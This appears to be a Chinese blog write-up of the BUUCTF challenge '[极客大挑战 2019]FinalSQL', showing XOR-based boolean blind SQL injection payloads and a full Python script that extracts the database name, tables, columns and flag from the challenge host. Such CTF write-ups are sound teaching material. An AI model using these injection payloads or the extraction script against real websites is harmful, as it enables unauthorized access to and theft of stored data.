当前位置:网站首页>[极客大挑战 2019]FinalSQL
[极客大挑战 2019]FinalSQL
2022-08-05 03:52:00 【pakho_C】
[极客大挑战 2019]FinalSQL
依次点击5个页面
到最后一个页面发现提示尝试第6个页面,观察到url中的id,输入6得到
有参数,尝试单引号
提示error 那么应该存在sql注入,尝试永真式
肯定有过滤了,fuzz一波:
过滤了不少,但是异或^没被过滤,并且没有报错页面,那么应该是盲注
使用异或的特性:相同为0 不同为1 测试
利用id=0^1为NO! Not this! Click others~~~ id=1^1为ERROR!!!来进行盲注的判断
编写爆破脚本,参考这位佬的:[极客大挑战 2019]FinalSQL
1.爆破数据库名核心语句:0^(ascii(substr((select(database())),"+str(i)+",1))>"+str(mid)+")
爆破数据库名为geek
2.爆破表名核心语句:0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(i)+",1))>"+str(mid)+")
爆破出表名为F1naI1y,Flaaaaag
3.爆破字段名 核心语句:0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),"+str(i)+",1))>"+str(mid)+")
F1naI1y表列名为id username password
0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),"+str(i)+",1))>"+str(mid)+")
Flaaaaag表字段为id fl4gawsl
猜测flag在fl4gawsl里
4.爆破flag 核心语句:0^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),"+str(i)+",1))>"+str(mid)+")
flag不在此处,查询另一张表的password字段
找到flag
完整脚本代码:
import requests
target = "http://f394d9ca-2bcb-4014-bf77-82cd9e2a9963.node4.buuoj.cn:81/search.php"
def getDataBase(): #获取数据库名
database_name = ""
for i in range(1,1000): #注意是从1开始,substr函数从第一个字符开始截取
low = 32
high = 127
mid = (low+high)//2
while low < high: #二分法
params={
"id":"0^(ascii(substr((select(database())),"+str(i)+",1))>"+str(mid)+")" #注意select(database())要用()包裹起来
}
r = requests.get(url=target,params=params)
if "others" in r.text: #为真时说明该字符在ascii表后面一半
low = mid+1
else:
high = mid
mid = (low+high)//2
if low <= 32 or high >= 127:
break
database_name += chr(mid) #将ascii码转换为字符
print("数据库名:" + database_name)
def getTable(): #获取表名
column_name=""
for i in range(1,1000):
low = 32
high = 127
mid = (low+high)//2
while low<high:
params = {
"id": "0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(i)+",1))>"+str(mid)+")"
}
r = requests.get(url=target,params=params)
if "others" in r.text:
low = mid + 1
else:
high = mid
mid = (low+high)//2
if low <= 32 or high >= 127:
break
column_name += chr(mid)
print("表名为:"+column_name)
def getColumn(): #获取列名
column_name = ""
for i in range(1,250):
low = 32
high = 127
mid = (low+high)//2
while low < high:
params = {
"id": "0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),"+str(i)+",1))>"+str(mid)+")"
}
r = requests.get(url=target, params=params)
if 'others' in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low <= 32 or high >= 127:
break
column_name += chr(mid)
print("列名为:" + column_name)
def getFlag(): #获取flag
flag = ""
for i in range(1,1000):
low = 32
high = 127
mid = (low+high)//2
while low < high:
params = {
"id" : "0^(ascii(substr((select(group_concat(password))from(F1naI1y)),"+str(i)+",1))>"+str(mid)+")"
}
r = requests.get(url=target, params=params)
if 'others' in r.text:
low = mid + 1
else:
high = mid
mid = (low+high)//2
if low <= 32 or high >= 127:
break
flag += chr(mid)
print("flag:" + flag)
getDataBase()
getTable()
getColumn()
getFlag()
边栏推荐
- Qixi Festival code confession
- leetcode-每日一题1403. 非递增顺序的最小子序列(贪心)
- public static <T> List<T> asList(T... a) 原型是怎么回事?
- DEJA_VU3D - Cesium功能集 之 056-智图Arcgis地图纠偏
- Acid (ACID) Base (BASE) Principles for Database Design
- 【树莓派】树莓派调光
- UE4 为子弹蓝图添加声音和粒子效果
- 2022-08-04T17:50:58.296+0800 ERROR Announcer-3 io.airlift.discovery.client.Announcer appears after successful startup of presto
- 国学*周易*梅花易数 代码实现效果展示 - 梅花心易
- MySql的索引学习和使用;(本人觉得足够详细)
猜你喜欢
Haproxy搭建Web群集
[Qixi Festival] Romantic Tanabata, code teaser.Turn love into a gorgeous three-dimensional scene and surprise her (him)!(send code)
There are several common event handling methods in Swing?How to listen for events?
21 Days Learning Challenge (2) Use of Graphical Device Trees
UE4 为子弹蓝图添加声音和粒子效果
shell脚本:for循环与while循环
用Unity发布APP到Hololens2无坑教程
How to solve the three major problems of bank data collection, data supplementary recording and index management?
How do newcomers get started and learn software testing?
银行数据采集,数据补录与指标管理3大问题如何解决?
随机推荐
大佬们,我注意到mysql cdc connector有参数scan.incremental.sna
Based on holding YOLOv5 custom implementation of FacePose YOLO structure interpretation, YOLO data format conversion, YOLO process modification"
cross domain solution
Ffmpeg - sources analysis
炎炎夏日教你利用小米智能家居配件+树莓派4接入Apple HomeKit
UE4 通过重叠事件开启门
Redis1:Redis介绍、Redis基本特性、关系型数据库、非关系型数据库、数据库发展阶段
The sword refers to Offer--find the repeated numbers in the array (three solutions)
UE4 第一人称角色模板 添加生命值和调试伤害
事件解析树Drain3使用方法和解释
[TA-Frost Wolf_may-"Hundred Talents Project"] Graphics 4.3 Real-time Shadow Introduction
Android interview question - how to write with his hands a non-blocking thread safe queue ConcurrentLinkedQueue?
测试薪资这么高?刚毕业就20K
BI业务分析思维:现金流量风控分析(二)信用、流动和投资风险
多列属性column元素的可见性:display、visibility、opacity、垂直对齐方式:vertical-align、z-index 越大越显示在上层
UE4 opens door via interaction (keyboard key)
DEJA_VU3D - Cesium功能集 之 056-智图Arcgis地图纠偏
Hard power or soft power, which is more important to testers?
presto启动成功后出现2022-08-04T17:50:58.296+0800 ERROR Announcer-3 io.airlift.discovery.client.Announcer
YYGH-13-客服中心